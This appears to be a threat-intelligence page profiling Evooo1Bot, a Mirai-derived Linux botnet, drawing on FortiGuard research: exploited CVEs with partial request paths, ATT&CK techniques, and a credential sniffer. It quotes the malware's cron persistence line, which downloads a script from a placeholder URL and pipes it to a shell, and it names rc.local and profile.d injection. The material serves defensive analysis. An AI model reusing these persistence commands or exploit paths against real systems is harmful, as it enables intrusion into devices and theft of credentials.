Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
19 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The exploit module contains a plaintext CVE table embedded in the binary... CVE-2023-1389 TP-Link Archer AX21 /cgi-bin/luci/;stok=/locale | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The exploit module contains a plaintext CVE table embedded in the binary... CVE-2025-1974 Kubernetes ingress-nginx /apis/networking/v1/ingresses | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2025-10123, D-Link DIR-823X Command Injection Vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2025-55583: D-Link DIR-868L B1 router Command Injection Vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2007-3010: Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2019-14931: Mitsubishi Electric Europe B.V. ME-RTU devices and INEA ME-RTU devices remote Command Injection vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2020-10987: Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2016-6277: NETGEAR Multiple Routers Remote Code Execution Vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2024-29269, Telesquare TLR-2005KSH Command Injection Vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
Take CVE-2023-34362 as an example. This vulnerability targets MOVEit Transfer... However, this exploit module doesn’t execute the file upload procedure but only passes a payload argument to “human2.aspx.” | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The exploit module contains a plaintext CVE table embedded in the binary... CVE-2021-36260 Hikvision IP Camera /SDK/webLanguage | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The exploit module contains a plaintext CVE table embedded in the binary... CVE-2024-4577 PHP-CGI (Windows) allow_url_include%3D | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2022-37055: D-Link Routers Buffer Overflow Vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The exploit module contains a plaintext CVE table embedded in the binary... CVE-2022-30525 Zyxel Firewall /ztp/cgi-bin/handler | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2018-14558: Tenda AC7, AC9, and AC10 Routers Command Injection Vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The following vulnerabilities were observed being exploited across the captured traffic: CVE-2021-46422: Telesquare SDT-CW3B1 Command Injection vulnerability | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The exploit module contains a plaintext CVE table embedded in the binary... CVE-2022-26134 Atlassian Confluence /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The exploit module contains a plaintext CVE table embedded in the binary... CVE-2022-29464 WSO2 products /fileupload/ | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
The exploit module contains a plaintext CVE table embedded in the binary... CVE-2024-10914 D-Link NAS /cgi-bin/account_mgr.cgi | FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named Evooo1Bot. The name derives from the hardcoded string “evooo1” found in every binary.
21 distinct techniques documented for this family, organized by ATT&CK tactic.
and a “sniffer” that looks for default access credentials that haven’t been changed since a device was put into service
Malware that adds multiple capabilities to the infamous Mirai botnet code has been actively exploiting vulnerabilities in internet-facing hardware for at least a month... Unpatched bugs in those devices allow Evooo1Bot to spread and carry out potential malicious activity
Cron: sets a scheduled task with an entry to download the script every 5 minutes: */5 * * * * /bin/sh -c '(wget -qO- <URL> || curl -sL <URL>) | /bin/sh > /dev/null 2>&1 &'
Shell profile: /etc/profile.d/ injection executed on login. rc.local: appends script to download the script in “/etc/rc.local.”
Cron: sets a scheduled task with an entry to download the script every 5 minutes: */5 * * * * /bin/sh -c '(wget -qO- <URL> || curl -sL <URL>) | /bin/sh > /dev/null 2>&1 &'
Shell profile: /etc/profile.d/ injection executed on login. rc.local: appends script to download the script in “/etc/rc.local.”
Cron: sets a scheduled task with an entry to download the script every 5 minutes: */5 * * * * /bin/sh -c '(wget -qO- <URL> || curl -sL <URL>) | /bin/sh > /dev/null 2>&1 &'
Static strings in Evooo1Bot are protected by a multi-layer pipeline applied at compile time... The AES and ChaCha20 keys are not stored directly in the binary... Another XOR decoding procedure is applied to a subset of strings in the .rodata section.
and a “sniffer” that looks for default access credentials that haven’t been changed since a device was put into service
Sniffer !sniff !stopsniff Reads /proc/net/tcp, intercepts HTTP Basic Authorization and Cookie headers, and writes to /tmp/.sniff.log
Evooo1Bot’s features include encrypted communications with command-and-control servers; a scanner that looks for Secure Shell (SSH) code and skips devices clearly set up as honeypots for malicious traffic
Once the checks pass, it begins establishing a connection with the C2 server on port 443. This port is chosen to blend in with expected HTTPS traffic at the network perimeter.
The malware also abuses the widely used SOCKS protocol that allows devices to connect with servers through a proxy... By transforming a compromised router, firewall, IP camera, or other edge device into a persistent proxy, the malware enables attackers to conceal their true origin, pivot into internal networks, and conduct follow-on operations through the victim's infrastructure.
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A previously undocumented Linux-based Mirai-derived botnet malware that exploits unpatched internet-facing devices, adds encrypted C2, SSH-aware scanning, honeypot evasion, credential sniffing, and SOCKS proxy capability to turn compromised edge devices into persistent proxies for concealment, pivoting, and follow-on operations.
A previously undocumented Linux botnet that reuses the Mirai DDoS engine but significantly extends it with encrypted C2 communications, SSH brute-force scanning, SOCKS relay/proxying, credential sniffing, persistence, file transfer, interactive shell access, and an integrated exploit module targeting multiple known vulnerabilities.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.